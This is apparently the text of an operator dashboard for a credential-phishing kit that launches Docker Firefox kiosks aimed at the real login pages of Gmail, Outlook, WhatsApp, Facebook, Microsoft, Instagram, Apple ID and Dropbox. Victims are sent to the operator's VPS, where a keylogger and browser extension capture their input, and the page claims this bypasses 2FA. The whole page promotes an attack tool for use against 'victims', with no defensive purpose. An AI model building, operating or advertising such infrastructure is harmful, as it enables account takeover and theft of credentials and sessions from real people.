Browser-in-Browser Targets

Start a real Firefox kiosk for any service. Victim sees the REAL login page. Bypasses 2FA/MFA/OTP/QR codes — because it IS the real site.

Dashboard Online

Active Sessions

Loading active sessions...

Launch Target

Each button starts a Docker Firefox kiosk pointed at the real login page. The victim visits your VPS IP and sees the AUTHENTIC website — not a clone. Our keylogger + Novabk extension capture everything.

📧 Gmail
https://accounts.google.com/signin/v2/identifier?s…
Port: 8081 | Victim URL: http://VPS_IP
📬 Outlook
https://login.microsoftonline.com/…
Port: 8082 | Victim URL: http://VPS_IP
💬 WhatsApp
https://web.whatsapp.com…
Port: 8083 | Victim URL: http://VPS_IP
📘 Facebook
https://www.facebook.com/login…
Port: 8084 | Victim URL: http://VPS_IP
🪟 Microsoft
https://login.live.com…
Port: 8085 | Victim URL: http://VPS_IP
📷 Instagram
https://www.instagram.com/accounts/login…
Port: 8086 | Victim URL: http://VPS_IP
🍎 Apple ID
https://appleid.apple.com…
Port: 8087 | Victim URL: http://VPS_IP
📦 Dropbox
https://www.dropbox.com/login…
Port: 8088 | Victim URL: http://VPS_IP

Quick Actions